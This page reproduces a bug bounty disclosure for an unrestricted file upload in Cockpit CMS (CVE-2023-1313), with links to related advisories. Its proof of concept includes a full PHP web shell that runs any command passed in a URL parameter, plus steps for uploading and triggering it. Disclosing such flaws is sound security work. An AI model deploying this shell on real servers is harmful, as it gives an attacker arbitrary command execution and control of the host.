Lucene search
ChoocsF73EEF49-004F-4B3B-9717-90525E65BA61HistoryMar 09, 2023 - 8:52 a.m.
File Upload Bypass Leads to Remote Code Execution (RCE)
2023-03-0908:52:18
choocs
www.huntr.dev
13
file upload
server security
rce
command execution
bug bounty
EPSS
0.001
Percentile
37.1%
Description
There is no extension checks during file upload. Attacker may upload file to execute malicious code in the server.
Proof of Concept
Step 1: Create a file with the content below and save it as evil.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
Step 2: Login to the Cockpit web server
Step 3: Go to assets
Step 4: Upload Assets
Step 5: Upload the file that created.
Step 6: Copy asset link and paste it at a new tab.
Step 7: Able to execute any commands.
Related
github
github
cockpit-hq/cockpit is vulnerable to unrestricted file uploads
2023-03-10 12:30:16
veracode
veracode
Remote Code Execution (RCE)
2023-03-17 03:38:59
prion
prion
Unrestricted file upload
2023-03-10 12:15:00
nvd
nvd
CVE-2023-1313
2023-03-10 12:15:21
osv
osv
CVE-2023-1313
2023-03-10 12:15:21
cockpit-hq/cockpit is vulnerable to unrestricted file uploads
2023-03-10 12:30:16
cve
cve
CVE-2023-1313
2023-03-10 12:15:21
cvelist
cvelist